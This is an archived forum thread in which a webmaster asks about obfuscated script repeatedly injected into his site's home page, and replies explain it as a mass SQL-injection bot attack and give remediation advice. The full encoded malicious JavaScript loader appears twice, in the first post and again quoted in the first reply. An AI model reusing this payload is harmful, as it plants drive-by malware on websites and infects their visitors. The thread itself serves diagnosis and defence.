new type of injection? rewrite default document?

Collapse
This topic is closed.
X
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • Brian Bozarth
    #1

    new type of injection? rewrite default document?

    This is weird, I'm pretty familiar with SQL Injection - but we're getting
    these weird injection that is writing in the default document or home page.
    What it's doing is putting in script code at the top or bottom of the home
    page... it looks something like this:

    <script>functio n xy1q4877d47d91a 36(q4877d47d922 09){ function q4877d47d929d5
    () {return 16;} return (parseInt(q4877 d47d92209,q4877 d47d929d5()));} function
    q4877d47d93974( q4877d47d94144) { var q4877d47d95c9b= 2; var
    q4877d47d94d7f= '';q4877d47d96c 3a=String.fromC harCode;for(q48 77d47d954cc=0;q 4877d47d954cc<q 4877d47d94144.l ength;q4877d47d 954cc+=q4877d47 d95c9b){
    q4877d47d94d7f+ =(q4877d47d96c3 a(xy1q4877d47d9 1a36(q4877d47d9 4144.substr(q48 77d47d954cc,q48 77d47d95c9b)))) ;}return
    q4877d47d94d7f; } var
    q4877d47d9740a= '3C736372697074 3E696628216D796 961297B646F6375 6D656E742E77726 9746528756E6573 636170652820272 533632536392536 362537322536312 536642536352532 302537332537322 536332533642532 372536382537342 537342537302533 612532662532662 537342537322537 352536352537322 536392536652536 372537342536662 536652536352537 332532652536652 536352537342532 662537332536352 536312537322536 332536382532652 536332536372536 392533662536322 536312536312536 372536392537322 536632625323725 326225346425363 125373425363825 326525373225366 625373525366525 363425323825346 425363125373425 363825326525373 225363125366525 363425366625366 425323825323925 326125333525333 525333525333625 333725323925326 225323725363425 333525333225333 825323725323025 373725363925363 425373425363825 336425333125333 825333125323025 363825363525363 925363725363825 373425336425333 325333025333725 323025373325373 425373925366325 363525336425323 725363425363925 373325373025366 325363125373925 336125323025366 525366625366525 363525323725336 525336325326625 363925363625373 225363125366425 363525336527292 93B7D766172206D 7969613D7472756 53B3C2F73637269 70743E';documen t.write(q4877d4 7d93974(q4877d4 7d9740a));</script>

    What it's doing is decoding itself into an iframe that links out to popups
    that will try and download a virus on your machine. I don't get the popup
    in my machine because i think i have a newer version of IE. But some
    people have complained that it is installing a virus on their machine.

    Also what is crazy is when I replace the file with a good version. In
    about 30 mins, it automatically overwritten with the infected version.
    Also I've noticed it on some other websites that I haven't touched.

    Has anyone encountered this before? Because I'm stumped as to the cause of
    it. I don't see the issue on our dev server. It seems to be IIS on a
    shared host.

    Brian


    Tags: None
    • ThatsIT.net.au
      #2
      Re: new type of injection? rewrite default document?

      It would seem you have a virus on your machine that is adding the code.

      this is just a thought I don't know it it will work, but try auditing access
      to the file. maybe then you can at least see what user the virus is running
      under. look in your task manager for processes running

      "Brian Bozarth" <brian@spaceboy interactive.com wrote in message
      news:eRZypv54IH A.2060@TK2MSFTN GP02.phx.gbl...
      This is weird, I'm pretty familiar with SQL Injection - but we're getting
      these weird injection that is writing in the default document or home
      page. What it's doing is putting in script code at the top or bottom of
      the home page... it looks something like this:
      >
      <script>functio n xy1q4877d47d91a 36(q4877d47d922 09){ function
      q4877d47d929d5 () {return 16;} return
      (parseInt(q4877 d47d92209,q4877 d47d929d5()));} function
      q4877d47d93974( q4877d47d94144) { var q4877d47d95c9b= 2; var
      q4877d47d94d7f= '';q4877d47d96c 3a=String.fromC harCode;for(q48 77d47d954cc=0;q 4877d47d954cc<q 4877d47d94144.l ength;q4877d47d 954cc+=q4877d47 d95c9b){
      q4877d47d94d7f+ =(q4877d47d96c3 a(xy1q4877d47d9 1a36(q4877d47d9 4144.substr(q48 77d47d954cc,q48 77d47d95c9b)))) ;}return
      q4877d47d94d7f; } var
      q4877d47d9740a= '3C736372697074 3E696628216D796 961297B646F6375 6D656E742E77726 9746528756E6573 636170652820272 533632536392536 362537322536312 536642536352532 302537332537322 536332533642532 372536382537342 537342537302533 612532662532662 537342537322537 352536352537322 536392536652536 372537342536662 536652536352537 332532652536652 536352537342532 662537332536352 536312537322536 332536382532652 536332536372536 392533662536322 536312536312536 372536392537322 536632625323725 326225346425363 125373425363825 326525373225366 625373525366525 363425323825346 425363125373425 363825326525373 225363125366525 363425366625366 425323825323925 326125333525333 525333525333625 333725323925326 225323725363425 333525333225333 825323725323025 373725363925363 425373425363825 336425333125333 825333125323025 363825363525363 925363725363825 373425336425333 325333025333725 323025373325373 425373925366325 363525336425323 725363425363925 373325373025366 325363125373925 336125323025366 525366625366525 363525323725336 525336325326625 363925363625373 225363125366425 363525336527292 93B7D766172206D 7969613D7472756 53B3C2F73637269 70743E';documen t.write(q4877d4 7d93974(q4877d4 7d9740a));</script>
      >
      What it's doing is decoding itself into an iframe that links out to popups
      that will try and download a virus on your machine. I don't get the
      popup in my machine because i think i have a newer version of IE. But
      some people have complained that it is installing a virus on their
      machine.
      >
      Also what is crazy is when I replace the file with a good version. In
      about 30 mins, it automatically overwritten with the infected version.
      Also I've noticed it on some other websites that I haven't touched.
      >
      Has anyone encountered this before? Because I'm stumped as to the cause
      of it. I don't see the issue on our dev server. It seems to be IIS on
      a shared host.
      >
      Brian
      >

        Comment

        • Bob Barrows [MVP]
          #3
          Re: new type of injection? rewrite default document?

          Brian Bozarth wrote:
          This is weird, I'm pretty familiar with SQL Injection - but we're
          getting these weird injection that is writing in the default document or
          home
          page. What it's doing is putting in script code at the top or bottom of
          the
          home page... it looks something like this:
          >
          Browse through the several threads about sql injection that have been posted
          in the last couple weeks. You should find posts that mention these links:

          aspmessageboard.com
          http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984

          SANS.edu Internet Storm Center - SANS Internet Storm Center
          http://isc.sans.org/diary.html?n&storyid=4294
          SANS.edu Internet Storm Center. Today's Top Story: Analysis using Gephi with DShield Sensor Data;A phishing campaign with QR codes rendered using an HTML table;

          Microsoft Learn: Build skills that open doors in your career
          http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx
          Gain technical skills through documentation and training, earn certifications and connect with the community


          In a nutshell, you've been attacked by a bot that uses google to find sites
          that might be vulnerable to sql injection, based on the use of querystrings
          in the urls. It then runs through a scripted routine to find the
          vulnerabilities in the sites, and if they exist, uses those vulnerabilities
          to insert those script tags you are seeing into every table in your
          database. Since your code is likely to be writing data tretrieved from the
          database to Response without validating or encoding it, it's really your
          code that is inserting the script tags into your pages.

          So the first thing you should do is check the data in your database. If
          corrupt, take it offline and restore a backup, or run a stored procedure
          which was posted by Old Pedant to attempt to cleanse it. Then, go through
          your server-side code with a fine tooth comb and

          1. Make your code impervious to sql injection by eliminating all use of
          dynamic sql, using parameters instead.
          See here for a better, more secure way to execute your queries by using
          parameter markers:
          Error 404 (Not Found)!!1
          http://groups-beta.google.com/group/microsoft.public.inetserver.asp.db/msg/72e36562fee7804e


          Personally, I prefer using stored procedures, or saved parameter queries
          as
          they are known in Access:

          Access:
          Error 404 (Not Found)!!1
          http://www.google.com/groups?hl=en&lr=&ie=UTF-8&oe=UTF-8&selm=e6lLVvOcDHA.1204%40TK2MSFTNGP12.phx.gbl


          http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&c2coff=1&selm=eHYxOyvaDHA.4020%40tk2msftngp13.phx.gbl



          SQL Server:

          http://groups.google.com/group/microsoft.public.inetserver.asp.general/msg/5d3c9d4409dc1701?hl=en&



          2. Use Server.HTMLEnco de when writing data to Response



          --
          Microsoft MVP - ASP/ASP.NET
          Please reply to the newsgroup. This email account is my spam trap so I
          don't check it very often. If you must reply off-line, then remove the
          "NO SPAM"


            Comment

            Previous template Next
            Working...